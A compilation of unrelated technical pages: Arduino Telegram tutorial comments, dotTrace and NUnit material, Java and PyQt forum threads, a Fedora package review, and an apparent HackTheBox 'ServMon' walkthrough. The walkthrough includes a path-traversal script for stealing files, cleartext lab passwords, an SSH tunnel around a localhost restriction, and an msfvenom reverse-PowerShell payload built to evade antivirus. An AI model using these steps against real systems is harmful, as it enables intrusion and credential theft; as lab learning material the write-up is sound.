Can you better describe your issue? Regards, Sara Hi, I have tested sucessfully on last month. But today, I tested again and It didn’t work. Program not have bug, but Telegram Bot don’t message me. Thank you. Hi. Update the library. 
Our code is now compatible with the latest version of the library. Regards, Sara HI, just to know, how do i write to change the line (CR). Pex. Alarm ! Motion Detection 12/05/2021 I am having this error exit status 1 Error compiling for board NodeMCU 1.0 (ESP-12E Module). I have tried to downgrade arduino json library but it did not avail. Hi. What’s the line of code highlighted with the error? Or can you give more details about the error? Regards, Sara Hi. I am very interested to know if you already have develop a program for nodemcu, mpu6050 and if the sensor detects a certain angle/acceleration it will notify user through Telegram. The one that I am trying to do is using IFTTT Maker but yours is much more easier to understand. I am very interested to know if it is possible to realize without the use of IFTTT Maker. Thank you very much & have a nice day ahead! Hi. Yes. You try to combine the following tutorials: – – I hope this helps. Regards, Sara Thank you ☺️ Instead of manually asking for the reading through Telegram, is it possible for this method to receive the notification alert automatically? Yes. You can program your board to send a message to telegram every X number of seconds. You can do that in the loop() of your program. Regards, Sara When uploading a program it’s showing a error invalid head of packet can u the sollution Hi. You need to press the ESP32 BOOT button when you start seeing a lot of dots ……… on the debugging window. This article might also help: Regards, Sara Hello Rui and Sara, very good this post as always just get the code and run, it works the first time. My question is if there is any command that checks if it is connected, I caught a case that I couldn’t run the commands after 3 days, restarted and started working again. I verified that you have a post to verify if it is connected to the wi-fi but I wanted something to verify if it is connected to the Telegram. 
I checked something on google and there is a command, but they use another library ( CTBot) and I found it interesting ” if (myBot.testConnection()) Serial.println(“nConnection Ok!”); else Serial.println(“nConnection failed!”); I don’t know if the UniversalTelegramBot library would have something like that? Hugs Ricardo Hi Sara, Thank you for your excellent work. I don’t know English and I have translated this with Google !!! 🙁 I have implemented this process to a control sketh of the wooden boiler of my house, within a web-serves where I see the operation of it, from the sofa !!!. The sketch you propose works perfectly for me in the ESP 32 WOORD 32s that I am using. When I implement communications with Telegram, an inconsistency occurs between the names of the objects that the libraries generate. Originally both libraries use “client” as the name of the object, and the compiler gives an error …, and I have changed it to this: WiFiClient client; // I establish the WiFi connector WiFiServer server (80); // Set 80 webServer WiFiClientSecure secured_client; UniversalTelegramBot bot (BOTtoken, secured_client); The bot.send function returns a “0” code. bool resulta = bot.sendMessage (CHAT_ID, “Bot started up”, “”); Serial.print (“Result start bot”); Serial.println (result); Alternatives? Sorry but I have not said … And I do not receive any message on Telegram. : – (( Hi. what are exactly the errors that you’re getting? Regards, Sara Hi Sara, Thank you for your interest. I am not an arduino expert …. I enclose the twists of the program that I consider are important for the purpose and the copy of the messages that are displayed on the console. You will see in the function “aviso_telegram” the call to the function ‘bot.sendMessage’ that I have seen returns a ‘bool’ and I show it in the console. Specifically, it returns a ‘0’ without any other type of warning. 
// Valores para el MySQL #include <MySQL_Connection.h> // COnector con el MySQL #include <MySQL_Cursor.h> // Puntero de insercion de filas en tabla del MySQL IPAddress server_addr(192,168,0,104); // IP of the MySQL server here char user[] = “arduino”; // MySQL user login username char password[] = “xxxx”; // MySQL user login password MySQL_Connection conn((Client *)&client); // Creacion del conector con MySQL // QUIERY que enviamos al MySQL para insertar datos en la BD … // FUNCIONES … int debbuger = 0; void trace(String posicion, int activo){ // debbug por consola if (activo > 0) { if (debbuger > 0){ Serial.println(posicion); } } } void aviso_telegram(int n){ // mensaje a telergram // 1 temperatura en sala < 5 grados, posible congelacion equipos // 2 sin sensores conectados // 3 falta pelets // 4 puesta abierta // trace(“Envio avisos por Telegram”,9); bool resul = bot.sendMessage(CHAT_ID, “Bot started up”, “”); Serial.print(“Resultado start bot “); Serial.print(resul); Serial.print(“Mensaje num. : “); Serial.println(n); switch (n){ case 1: bot.sendMessage(CHAT_ID, “Texto 1”, “”); break; default: bot.sendMessage(CHAT_ID, “No hay texto”, “”); break; } } … WiFi.begin(ssid, clave); #ifdef ESP32 secured_client.setCACert(TELEGRAM_CERTIFICATE_ROOT); // Add root certificate for api.telegram.org #endif while (WiFi.status() != WL_CONNECTED) { delay(500); Serial.print(“.”); …. void loop() { if ((millis() – lastTime) > timerDelay) { // Hemos superado el tiempo de latencia para actualizr la MySQL Serial.println(“Primera llamada a Telegram………………………..”); aviso_telegram(9); Serial.println(“Miro estado WiFi y reconecto en caso necesario”); while (WiFi.status() != WL_CONNECTED) { WiFi.mode(WIFI_STA); WiFi.begin(ssid, clave); delay(500); } …. 18:39:30.802 -> Conectando a la WiFi: TP-Link_A7G4 ….. 
18:39:33.280 -> Conexion establecida con la IP : 192.168.0.202 18:39:33.313 -> Conectando con el Servidor MySQL, en la direccion IP : 192.168.0.104 18:39:33.313 -> …trying… 18:39:33.908 -> Connected to server version 8.0.27-0ubuntu0.20.04.1 18:39:34.569 -> Primera llamada a Telegram……………………….. 18:39:42.533 -> Resultado start bot 0 18:39:42.533 -> Opcion mensaje envio Telegram : 9 18:39:50.532 -> Miro estado WiFi y reconecto en caso necesario 18:39:50.532 -> WiFi conectada. 18:39:50.532 -> Estado conexion con MySQL: 1 18:39:52.615 -> INSERT INTO arduino_db.datos_sensores (sen1, sen2, sen3, sen4, sen5, sen6, sen7, sen8, sen9, sen10) VALUES (-127.00, -127.00, 17.44, 23.00, 23.56, 16.00, -127.00, -127.00, 21.78, 45) —–> 184 18:39:53.244 -> Se actualiz la base de datos MySQL cada : 5 minutos. 18:40:01.212 -> Resultado start bot 0 18:40:01.212 -> Opcion mensaje envio Telegram : 4 18:40:09.670 -> Sensores conectados : 4 18:40:13.271 -> Sensores conectados : 4 18:40:16.905 -> Sensores conectados : 4 Hi Sara, Today I have been a bit busy and I could not get on with this until a while ago. The process has been: From the sketch that you propose in this article, I have taken the loop and embedded it in my program (commenting on the rest of the instructions in my loop), the result ….. It does not work !! I have been commenting instruction by instruction of my setup, and testing to see how it responded and I have located the specific instruction that makes it not work. If I comment the instruction: “WiFi.config (local_IP, gateway, subnet, primaryDNS, secondaryDNS);” from my setup and I run, the messages come out correctly .!!! 🙂 🙂 I have it so that the ESP32 has a fixed IP and can access the web with the data from the sensors directly. It would be good if someone tried to repeat this situation, in case it is a problem of updating libraries. 
The only library that I have been able to see the version is MySQlConnectorArduino V.1.1.1 If someone explains to me how to see the versions of the libraries, I could complete this information. Anyway, thanks for your interest. Hello, and thank you for the nice tutorial. I have a question. If a person sends a message to the BOT, but the arduino is offline, is there any way to send a message “server is offline”? Or since it has to be connected to the Wi-Fi, it won’t be able to send? Hi. Because it is offline, it won’t be able to send. Regards Sara Hello, can i ask something ? Can i use Wifi Shield for this project ? Is there any code that need to changes ? Thank you for very interesting projects. I was wondering if you can incorporate the ESP.deepSleep() function in the code. Hi. Yes. If you use the PIR motion sensor as an external wake up source. Regards, Sara Do I really need to buy the Hardware components for the project to function? Hi. To detect motion you need a motion sensor. If you just want to send messages to telegram, you can omit the sensor section. Regards, Sara Hi Rui and Sara, how can I solve this problem? 
    C:\Users\giasc\Documents\Arduino\libraries\ESP8266WiFi\src\ESP8266WiFiMulti.cpp: In function ‘wl_status_t waitWiFiConnect(uint32_t)’:
    C:\Users\giasc\Documents\Arduino\libraries\ESP8266WiFi\src\ESP8266WiFiMulti.cpp:89:5: error: ‘esp_delay’ was not declared in this scope
       89 |     esp_delay(connectTimeoutMs,
          |     ^~~~~~~~~
    C:\Users\giasc\Documents\Arduino\libraries\ESP8266WiFi\src\ESP8266WiFiMulti.cpp: In member function ‘int8_t ESP8266WiFiMulti::startScan()’:
    C:\Users\giasc\Documents\Arduino\libraries\ESP8266WiFi\src\ESP8266WiFiMulti.cpp:241:5: error: ‘esp_delay’ was not declared in this scope
      241 |     esp_delay(WIFI_SCAN_TIMEOUT_MS,
          |     ^~~~~~~~~
    C:\Users\giasc\Documents\Arduino\libraries\ESP8266WiFi\src\ESP8266WiFiSTA-WPS.cpp: In member function ‘bool ESP8266WiFiSTAClass::beginWPSConfig()’:
    C:\Users\giasc\Documents\Arduino\libraries\ESP8266WiFi\src\ESP8266WiFiSTA-WPS.cpp:77:5: error: ‘esp_suspend’ was not declared in this scope
       77 |     esp_suspend( { return _wps_config_pending; });
          |     ^~~~~~~~~~~
    C:\Users\giasc\Documents\Arduino\libraries\ESP8266WiFi\src\ESP8266WiFiGeneric.cpp: In member function ‘bool ESP8266WiFiGenericClass::mode(WiFiMode_t)’:
    C:\Users\giasc\Documents\Arduino\libraries\ESP8266WiFi\src\ESP8266WiFiGeneric.cpp:442:9: error: ‘esp_delay’ was not declared in this scope
      442 |         esp_delay(timeoutValue, m { return wifi_get_opmode() != m; }, 5);
          |         ^~~~~~~~~
    C:\Users\giasc\Documents\Arduino\libraries\ESP8266WiFi\src\ESP8266WiFiGeneric.cpp: In member function ‘int ESP8266WiFiGenericClass::hostByName(const char*, IPAddress&, uint32_t)’:
    C:\Users\giasc\Documents\Arduino\libraries\ESP8266WiFi\src\ESP8266WiFiGeneric.cpp:626:9: error: ‘esp_delay’ was not declared in this scope
      626 |         esp_delay(timeout_ms, { return _dns_lookup_pending; }, 1);
          |         ^~~~~~~~~
    C:\Users\giasc\Documents\Arduino\libraries\ESP8266WiFi\src\ESP8266WiFiScan.cpp: In member function ‘int8_t ESP8266WiFiScanClass::scanNetworks(bool, bool, uint8, uint8*)’:
    C:\Users\giasc\Documents\Arduino\libraries\ESP8266WiFi\src\ESP8266WiFiScan.cpp:100:9: error: ‘esp_suspend’ was not declared in this scope
      100 |         esp_suspend( { return !ESP8266WiFiScanClass::_scanComplete && ESP8266WiFiScanClass::_scanStarted; });
          |         ^~~~~~~~~~~
    exit status 1
    Error compiling for board LOLIN(WEMOS) D1 R2 & mini.

Hi. Check your ESP8266 boards version. You may need to downgrade in Tools > Boards > Boards Manager > ESP8266. Regards, Sara

Dear Sara Santos, is it possible to “enable and disable” the “bot and the motion detection” by sending Telegram messages? Can anyone revise the code and help me (I am not able to do it)? Best Regards, Kemal
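Several of the questions in the comments come down to what the UniversalTelegramBot library actually does on the wire: it POSTs to Telegram's HTTP Bot API. As a minimal sketch of that sendMessage call in Python (the token and chat ID below are made-up placeholders), building the request without sending it:

```python
from urllib.parse import urlencode
from urllib.request import Request

def build_send_message(token, chat_id, text):
    """Build (but do not send) the sendMessage call the bot library makes."""
    url = f"https://api.telegram.org/bot{token}/sendMessage"
    payload = urlencode({"chat_id": chat_id, "text": text}).encode()
    return Request(url, data=payload, method="POST")

# Placeholder credentials -- substitute your own bot token and chat ID.
req = build_send_message("123456:ABC-DEF", "987654321", "Motion detected!!")
print(req.full_url)
# To actually send it: urllib.request.urlopen(req)
```

If this URL works with your real token from a browser or curl, the values pasted into the sketch are correct; a 401 Unauthorized reply, as in one of the comments above, points at a wrong bot token.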
https://randomnerdtutorials.com/telegram-esp8266-nodemcu-motion-detection-arduino/?replytocom=727636
Choosing the Right View for Snapshot Data

After a profiling session is over, dotTrace creates a performance snapshot. You can further work with this snapshot, investigating and analyzing application performance problems. Let's take a look at using the various analysis views provided by dotTrace to diagnose these problems. Depending on your knowledge of the profiled application and your needs, you can lean towards one view or another.

Overview

This view helps find out details of the profiling process and some general information about a snapshot. In addition, it lets you look through the list of annotated or adjusted functions.

Threads Tree and Call Tree

You can start your investigation with the Threads Tree view to see the full picture and understand which functions are executed in which threads and how many threads are spawned by your application. Another way is to start with the Call Tree view. In both views, you navigate from the first to the last function call just like your application does. The difference is that in Threads Tree function calls are considered within threads, and in Call Tree within the whole application process, excluding the division into threads. All metrics are calculated accordingly.

Back Traces

This view is available only if a function is opened in a new tab. It helps you trace the call chain that led to this particular function. If the function is called from different call sites, there will be several call chains.

Plain List

This is the view that helps you not only review snapshot data, but also rearrange it in different ways. By default, you get a list of all functions sorted by total execution time. Using this view you can study how much time is spent in the function itself and how many times the current function is called. Functions can also be sorted by any of four metrics and by function name as well. This helps you find a function with the highest own time or a function with the greatest number of calls.
Moreover, calls can optionally be grouped by Class or Namespace, enabling you to investigate problem classes and even namespaces.

Hot Spots

If you want to focus on the most time-consuming functions, it's better to use the Hot Spots view. It represents a list of callback trees for each of the 100 functions with the highest own time.

Source View

After a performance issue is located, it's useful to view the source code and find out why a particular function is slow.
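The Plain List and Hot Spots behaviour just described — sorting every function by a chosen metric and keeping the ones with the highest own time — can be sketched in plain Python (the function names and numbers below are made up):

```python
# Each record: (function name, own time in ms, number of calls)
snapshot = [
    ("Parse", 120, 10),
    ("Render", 450, 3),
    ("Log", 80, 500),
]

def plain_list(rows, metric):
    """Sort all functions by one metric, descending, like the Plain List view."""
    index = {"own_time": 1, "calls": 2}[metric]
    return sorted(rows, key=lambda r: r[index], reverse=True)

def hot_spots(rows, top=2):
    """Keep only the functions with the highest own time, like Hot Spots."""
    return plain_list(rows, "own_time")[:top]

print([name for name, *_ in hot_spots(snapshot)])  # → ['Render', 'Parse']
```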
http://www.jetbrains.com/help/profiler/Studying_Profiling_Results__Different_Ways_of_Presenting_Snapshot_Data.html
Introduction

The NSClient++ web interface on this machine is restricted to localhost only, but this can be circumvented by using an SSH tunnel.

nmap scan

    nmap -sC -sV -oN servmon -vvv 10.10.10.184

In summary these are the ports:

    PORT     STATE SERVICE       REASON          VERSION
    21/tcp   open  ftp           syn-ack ttl 127 Microsoft ftpd
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    |_01-18-20 12:05PM Users
    | ftp-syst:
    |_  SYST: Windows_NT
    22/tcp   open  ssh           syn-ack ttl 127 OpenSSH for_Windows_7.7 (protocol 2.0)
    80/tcp   open  http          syn-ack ttl 127
    5666/tcp open  tcpwrapped    syn-ack ttl 127
    6699/tcp open  napster?      syn-ack ttl 127
    8443/tcp open  ssl/https-alt syn-ack ttl 127

    Host script results:
    |_clock-skew: 2m30s
    | p2p-conficker:
    |   Checking for Conficker.C or higher...
    |   Check 1 (port 40676/tcp): CLEAN (Couldn't connect)
    |   Check 2 (port 20065/tcp): CLEAN (Couldn't connect)
    |   Check 3 (port 54993/udp): CLEAN (Failed to receive data)
    |   Check 4 (port 62863/udp): CLEAN (Timeout)
    |_  0/4 checks are positive: Host is CLEAN or ports are blocked
    | smb2-security-mode:
    |   2.02:
    |_    Message signing enabled but not required
    | smb2-time:
    |   date: 2020-04-15T04:42:56
    |_  start_date: N/A

I have tested ports 139 and 445 and did web fuzzing on the web server. I could not find an entry point for an SMB vulnerability, and web fuzzing also did not enumerate any useful directory:

    -----------------
    DIRB v2.22
    By The Dark Raver
    -----------------
    OUTPUT_FILE: dirb_result
    START_TIME: Thu Apr 16 11:10:01 2020
    URL_BASE:
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
    -----------------
    GENERATED WORDS: 4612
    ---- Scanning URL: ----
    + (CODE:200|SIZE:1150)
    + (CODE:200|SIZE:340)
    -----------------
    END_TIME: Thu Apr 16 11:38:15 2020
    DOWNLOADED: 4612 - FOUND: 2

NVMS-1000 web portal

Searching the web with DuckDuckGo, I found that there is a path traversal vulnerability. On searchsploit this exploit can be found. Reading the exploit doc you will see a PoC:

    POC: curl http://[IP Address]/../../../mnt/mtd/config/config.dat 2>/dev/null | strings

I tested this with msfconsole and files can be downloaded.
The NSClient++ configuration file can be downloaded from the path /program+files/nsclient%2B%2B/nsclient.ini — you need to understand that the file path is a URI, hence the "/" and spaces have to be URL-encoded. In nsclient.ini a plaintext password for NSClient++ is found; this is used when rooting the machine, so first of all we need to find the user's flag.

User's flag hint

FTP to 10.10.10.184 — this FTP server allows anonymous login. Then enumerate the directories once the connection is established. Download the files in the respective directories to find out what they are. Looking at Confidential.txt, I found out where to look for passwords. Reading "Notes to do.txt", I understood that NSClient++ cannot be accessed remotely; this coincides with nsclient.ini, which only allows 127.0.0.1.

Looking at nsclient.ini

Download password.txt

I will be using the same path traversal exploit for NVMS-1000 to help me download the password.txt file. I could use the same exploit in msfconsole to do it, but I decided to write my own Python script to download the file:

    import requests

    # You will need to encode the ../ as URL in order for the web to understand it 😉
    # I have fuzzed it until it spits out the nsclient.ini hahaha
    trasversal = "..%2F"
    web = "http"
    port = 80
    outfile = "passwords.txt"
    # on msfconsole use the auxiliary/scanner/http/tvt_nvms_traversal
    # set filepath to /Users/Nathan/Desktop/Passwords.txt
    filepath = "Users%2FNathan%2FDesktop%2FPasswords.txt"
    uri = f"{web}://10.10.10.184/{trasversal * 3}{filepath}"
    print(uri)
    response = requests.get(uri, verify=False)
    if response.status_code == 200:
        with open(f"/root/htb/servmon/{outfile}", "w") as file:
            file.write(response.text)

There are several passwords. I tested each password for both nathan and nadine over SSH, and finally I got connected as nadine with this password: L1k3B1gBut7s@W0rk

Get user's flag

ssh nadine@10.10.10.184 with the password found.
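Instead of hand-fuzzing the ..%2F encoding as the comment in the script above admits, the traversal URI can be generated with Python's standard library. A small sketch using the same target path:

```python
from urllib.parse import quote

def traversal_url(host, relative_path, depth=3):
    """Build the NVMS-1000 path-traversal URL, percent-encoding every segment."""
    up = quote("../", safe="") * depth       # "..%2F..%2F..%2F"
    encoded = quote(relative_path, safe="")  # "/" and spaces become %2F and %20
    return f"http://{host}/{up}{encoded}"

print(traversal_url("10.10.10.184", "Users/Nathan/Desktop/Passwords.txt"))
```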
Privilege escalation

As only 127.0.0.1 is allowed to access the NSClient++ web portal, I need an SSH tunnel to bypass this restriction. Also, the web portal may not display properly in Firefox; I recommend Chromium, which handles it much better.

ssh -L 8080:127.0.0.1:8443 nadine@10.10.10.184

This is the command line to set up the SSH tunnel. What it means is that your attacking machine listens on 127.0.0.1:8080, and any traffic sent there is forwarded over the SSH connection to 10.10.10.184, which in turn delivers it to the remote machine's own localhost on port 8443.

I then use chromium --no-sandbox to open the NSClient++ web UI and log in with the password discovered in nsclient.ini. This is the nsclient password discovered:

ew2x6SsGTxjRwXOT

There is a vulnerability in NSClient++, which you can find with:

searchsploit nsclient

Reading the instructions, the prerequisites are to enable CheckExternalScripts and Scheduler; you can check in the web UI that these two modules are enabled. I tried to add my own scripts in the web UI, but I had problems configuring them, so I turned to the NSClient++ API instead, using the "add script" API.

I tried to upload nc.exe, but it was deleted; I suspect it was quarantined by Windows Defender. A reverse-shell PowerShell script I uploaded was also deleted. The solution was to use msfvenom and create a batch file that triggers a PowerShell payload from within the batch file:

msfvenom -p cmd/windows/reverse_powershell lhost=10.10.14.20 lport=4444 -o evilps.bat

Use this curl command to upload the batch file from my attacking machine to ServMon:

curl -s -k -u admin -X PUT --data-binary @evilps.bat

Notice that the address used is the local one that goes through the SSH tunnel. Set up the multi/handler in msfconsole with the same payload used for msfvenom, then run the command in the NSClient++ web UI console.
https://cyruslab.net/2020/04/17/hacktheboxservmon/
can't import java to javaFX

Hi! I can't import my Java file in JavaFX. They are in the same package.

------- java -------
package x;

class MyJava {}

---------- javaFX ----------
package x;

import x.MyJava;  // <---- an error occurred: cannot find symbol!!

In NetBeans 6.0.1's plugin it did not! But in NetBeans 6.1 (fx plugin version 2008-04-18_14-52-03) an error occurred. Please, help!!

Reply: Dude, from the source I can read that both files are in the same package, so you don't need to import anything :D Anyway, if you still have problems, post the full source and the error message.

Reply: I know that you don't need to import within the same package. I tried that first! But an error occurred, so I tried this method. If it's only my problem in NetBeans 6.1, I'll try again. Thank you.

Reply: I tried the example with plugin 2008-06-15_02-32-47.zip and it works for me. Probably something has been fixed in the JavaFX Script compiler.

Reply: Thank you for replying! I found that NetBeans 6.1's Preview window does not work right! An error occurred in the Preview window, but compiling worked well, and the program worked well too! Until now the Preview window has displayed the error message!
Message was edited by: expsan

Reply: Hi, I have the same problem, I can't import Java classes into my fx classes.
> as Hello; this error occurs: undefined type javaClass.Hello in import <

My Java class looks like this:

package javaClass;

public class Hello {
    //code
}

My fx class:

package javaClass;

import javaClass.Hello;
//code

Can anybody tell me the reason why it doesn't work?
https://www.java.net/node/679526
Microsoft announced full support for NUnit and other testing frameworks in Visual Studio 11. However, today you still don't have NUnit integration out of the box. Of course, you can use the ReSharper plugin or TestDriven.NET, but these are not free (although worth every cent). Last week I discovered Visual NUnit, a free alternative to run your NUnit tests inside Visual Studio.

Visual NUnit is an open source NUnit runner for Visual Studio 2010. It provides a convenient view of test cases and makes it easy to debug tests (red arrow) inside the development environment. It does not require a separate test project. It is implemented as a Visual Studio Integration Package.

Features:
- Easy test debugging
- Easy and fast NUnit test execution
- .NET 2.0, 3.0, 3.5 and 4.0 support
- Test execution progress, time and summary
- Stack trace view
- Test filtering based on project, namespace and fixture
http://bartwullems.blogspot.com/2011/11/visual-studio-2010-nunit-support.html
making a Qt Designer plugin with python -- plugins not visible in Designer

I am trying to create a custom widget plugin for Qt Designer using PyQt5. I am using Python 3.7, PyQt5 (5.13.0), PyQt5-sip (4.19.18), macOS 10.14.5, and Qt Designer (5.13) from the Qt Creator install for Mac (free version).

Before making my own plugin, I simply want to set up the Designer sample plugins to make sure I understand the process. To test, I downloaded the example files analogclock.py and analogclockplugin.py. I modified the plugins.py app like this:

import sys

from PyQt5.QtCore import QLibraryInfo, QProcess, QProcessEnvironment

# Tell Qt Designer where it can find the directory containing the plugins and
# Python where it can find the widgets.
env = QProcessEnvironment.systemEnvironment()
env.insert('PYQTDESIGNERPATH', '[path to the plugin.py files]/designer_plugins')
env.insert('PYTHONPATH', '[path to the widgets]/designer_widgets')

# Start Designer.
designer = QProcess()
designer.setProcessEnvironment(env)

designer_bin = QLibraryInfo.location(QLibraryInfo.BinariesPath)
if sys.platform == 'darwin':
    designer_bin = '/Users/[user]/Qt/5.13.0/clang_64/bin/Designer.app/Contents/MacOS/Designer'
else:
    designer_bin += '/designer'

designer.start(designer_bin)
designer.waitForFinished(-1)

When I run plugins.py, Designer opens as expected, but I do not see the plugins at all. I've read that pyqt5.dylib is necessary, but it doesn't exist anywhere on my computer. So:
- is this the cause?
- if yes, where can I get it or how can I make it?
- once I have it, where do I put it?

I am familiar with Qt Designer and PyQt, but not an expert. Please explain like you're talking to a pretty clueless person. Thanks.

EDIT: I have installed SIP and PyQt5 from source. This added the libpyqt5.dylib file to Qt/5.13.0/clang_64/plugins/designer/ but I got this error:

ERROR:root:PyCapsule_GetPointer called with incorrect name
EDIT 2: The only way I could get rid of that error was to uninstall PyQt5-sip and reinstall it via pip (same version though, 4.19.18). But still no plugins. When I check 'About Plugins' in the Designer menu, I can see libpyqt5.dylib listed. I assume that if things were correct, the analogclock widget would be seen there as well as in the left-side area of the main window where all the widgets are.

EDIT 3: After setting QT_DEBUG_PLUGINS to 1, I can see this in the terminal output:

Found metadata in lib /Users/.../Qt/5.13.0/clang_64/plugins/designer/libpyqt5.dylib, metadata=
{
    "IID": "org.qt-project.Qt.QDesignerCustomWidgetCollectionInterface",
    "archreq": 0,
    "className": "PyCustomWidgets",
    "debug": false,
    "version": 331008
}
loaded library "/Users/.../Qt/5.13.0/clang_64/plugins/designer/libpyqt5.dylib"

This seems good and explains (I think) why I can see libpyqt5.dylib in the plugin list, but it does not explain why the widgets themselves are missing. Any ideas? How can I do more debugging?

EDIT 4: Now I notice that near the end of the debug output it says:

ModuleNotFoundError: No module named 'PyQt5'

This disappears when I don't set the environment variables (i.e., if I run Designer from the terminal without user$ export PYQTDESIGNERPATH='the path'). Anyone out there in Qt land??

@anp405, my first guess would be that by setting PYTHONPATH you are losing the location of the PyQt5 package. This depends on your Python and environment setup, but if there is some existing PYTHONPATH, you are overriding it completely instead of complementing it. You can verify this by opening a new command line session, setting PYTHONPATH to wherever your code sets it, then running the Python interpreter and trying to import PyQt5. Another guess would be that your child process uses a different Python environment (e.g. the built-in system Python 2), which does not have PyQt5 installed in its site-packages.
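Following the reply's first guess, one way to avoid clobbering an existing PYTHONPATH in plugins.py is to prepend to it rather than overwrite it. A minimal sketch of that idea (the helper name here is mine, not part of PyQt or Qt):

```python
import os

def prepend_pythonpath(extra, current=None):
    """Return a PYTHONPATH value with `extra` in front of whatever
    was already set, instead of replacing it outright."""
    if current is None:
        current = os.environ.get('PYTHONPATH', '')
    return extra if not current else extra + os.pathsep + current

# In plugins.py this could then be used as (hypothetical usage):
#   env.insert('PYTHONPATH',
#              prepend_pythonpath('[path to the widgets]/designer_widgets',
#                                 env.value('PYTHONPATH', '')))
print(prepend_pythonpath('/widgets', ''))       # /widgets
print(prepend_pythonpath('/widgets', '/site'))  # /widgets:/site on Unix
```

Using os.pathsep keeps the sketch portable, since PYTHONPATH entries are separated by ":" on Unix and ";" on Windows.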
https://forum.qt.io/topic/106284/making-a-qt-designer-plugin-with-python-plugins-not-visible-in-designer/2
Red Hat Bugzilla – Bug 222522
Review Request: aqbanking - A library for online banking functions and financial data import/export
Last modified: 2014-03-16 23:04:57 EDT

Spec URL:
SRPM URL:

Description: aqbanking, assorted frontends, backend, bindings, etc. aqbanking is the online banking library used by gnucash (and, potentially, kmymoney and grisbi). A change from the Fedora Core package is that we build all the backends and frontends.

Created attachment 145526 [details] build failure log

Not a full review, just an early bird's picks:

* %defattr missing in several sub-packages

* Obsoletes ought to specify max. versions (using "LT" or "LE" inequations)

* main package must not own %{_libdir}/gwenhywfar since that belongs into the "gwenhywfar" pkg already

* Excludes are not symmetric. That's dangerous since you can lose files:

main package:
%exclude %{_libdir}/aqbanking/plugins/*/debugger
%exclude %{_libdir}/aqbanking/plugins/*/frontends/*
%exclude %{_libdir}/aqbanking/plugins/*/wizards

qbanking package:
%{_libdir}/aqbanking/plugins/*/debugger
%{_libdir}/aqbanking/plugins/*/frontends/qbanking
%{_libdir}/aqbanking/plugins/*/wizards

You exclude everything in %{_libdir}/aqbanking/plugins/*/frontends/* but only %{_libdir}/aqbanking/plugins/*/frontends/qbanking is included explicitly. Other content below %{_libdir}/aqbanking/plugins/*/frontends/ would be skipped/excluded silently.

*

* [ "$RPM_BUILD_ROOT" != "/" ] && rm -rf $RPM_BUILD_ROOT
  Useless check. Nowadays buildroot cannot be "/" anymore.
* "Requires: pkgconfig" in the frontends' -devel packages is redundant, since they all need aqbanking-devel which in turn requires pkgconfig for all its *-config queries (due to the applied Patch2)

Doesn't build in mock (rawhide x86_64); build.log ends with:

<<
DIE_RPATH_DIE="/usr/lib64:$DIE_RPATH_DIE" gcc -O2 -g -pipe -Wall -Wp,-D_FORTIFY_SOURCE=2 -fexceptions -fstack-protector --param=ssp-buffer-size=4 -m64 -mtune=generic -g -Wall -g -o .libs/testlib testlib.o ./.libs/libcbanking.so
/usr/bin/ld: warning: libaqbanking.so.16, needed by ./.libs/libcbanking.so, not found (try using -rpath or -rpath-link)
testlib.o: In function `main':
/builddir/build/BUILD/aqbanking-2.1.0/src/frontends/cbanking/testlib.c:6: undefined reference to `AB_Banking_free'
./.libs/libcbanking.so: undefined reference to `AB_Banking_SetProgressEndFn'
./.libs/libcbanking.so: undefined reference to `AB_Banking_SetHideBoxFn'
./.libs/libcbanking.so: undefined reference to `AB_Banking_new'
./.libs/libcbanking.so: undefined reference to `AB_Banking_SetProgressLogFn'
./.libs/libcbanking.so: undefined reference to `AB_Banking_InputBox'
./.libs/libcbanking.so: undefined reference to `AB_Banking_SetShowBoxFn'
./.libs/libcbanking.so: undefined reference to `AB_Banking_SetMessageBoxFn'
./.libs/libcbanking.so: undefined reference to `AB_Banking_SetGetPinFn'
./.libs/libcbanking.so: undefined reference to `AB_BANKING__INHERIT_GETLIST'
./.libs/libcbanking.so: undefined reference to `AB_BANKING__INHERIT_SETDATA'
./.libs/libcbanking.so: undefined reference to `AB_Banking_SetProgressAdvanceFn'
./.libs/libcbanking.so: undefined reference to `AB_Banking_SetInputBoxFn'
./.libs/libcbanking.so: undefined reference to `AB_Banking_MessageBox'
./.libs/libcbanking.so: undefined reference to `AB_Banking_SetProgressStartFn'
collect2: ld returned 1 exit status
make[4]: *** [testlib] Error 1
make[4]: Leaving directory `/builddir/build/BUILD/aqbanking-2.1.0/src/frontends/cbanking'
make[3]: *** [all-recursive] Error 1
make[3]: Leaving directory `/builddir/build/BUILD/aqbanking-2.1.0/src/frontends'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/builddir/build/BUILD/aqbanking-2.1.0/src'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/builddir/build/BUILD/aqbanking-2.1.0'
make: *** [all] Error 2
error: Bad exit status from /var/tmp/rpm-tmp.37465 (%build)
>>

Other minor issues:
Shouldn't the BuildRequires on python be python-devel instead? Also, the python packaging guideline mandates defining python_sitelib at the top of your specfile, so the files under the -python-%{name} subpackages would just go into %{python_sitelib}/%{name}/.

(In reply to comment #1)
> * %defattr missing in several sub-packages
Gack, fixed.

> * Obsoletes ought to specify max. versions (using "LT" or "LE"
> inequations)
They're obsolete upstream projects that this replaced - is there really a need to specify a version for such things?

> * main package must not own %{_libdir}/gwenhywfar since that belongs
> into the "gwenhywfar" pkg already
Fixed.

> You exclude everything in
> %{_libdir}/aqbanking/plugins/*/frontends/*
> but only
> %{_libdir}/aqbanking/plugins/*/frontends/qbanking
> is included explicitly. Other content below
> %{_libdir}/aqbanking/plugins/*/frontends/
> would be skipped/excluded silently.
So, other frontends could eventually add code. If I only exclude the specific frontend, the code will end up wrongly in the main package. If I exclude all, as is currently done, it will end up silently dropped. Fun. I suppose ending up in the wrong package is better than being silently missed.

> *
??? Why bring automake into the buildroot if the package never calls it? Seems better to have something else own the dir.
> * "Requires: pkgconfig" in the frontends' -devel packages is redundant,
> since they all need aqbanking-devel which in turn requires pkgconfig
> for all its *-config queries (due to the applied Patch2)
True, but since all the -config scripts *explicitly* call it, I'm more comfortable leaving the Requires: in.

(In reply to comment #2)
> Doesn't build in mock (rawhide x86_64), build.log ends with;
Will poke at it. Yay libtool.

> Other minor issues;
> Shouldn't Buildrequires on python be python-devel instead?
It doesn't link against libpython, so, no.

> Also the python packaging guideline mandates defining python_sitelib at the top
> of your specfile, so the files under -python-%{name} subpackages would just go
> into %{python_sitelib}/%{name}/
Is this on the wiki somewhere? I'm not finding it.

(In reply to comment #4)
> > Also the python packaging guideline mandates defining python_sitelib at the top
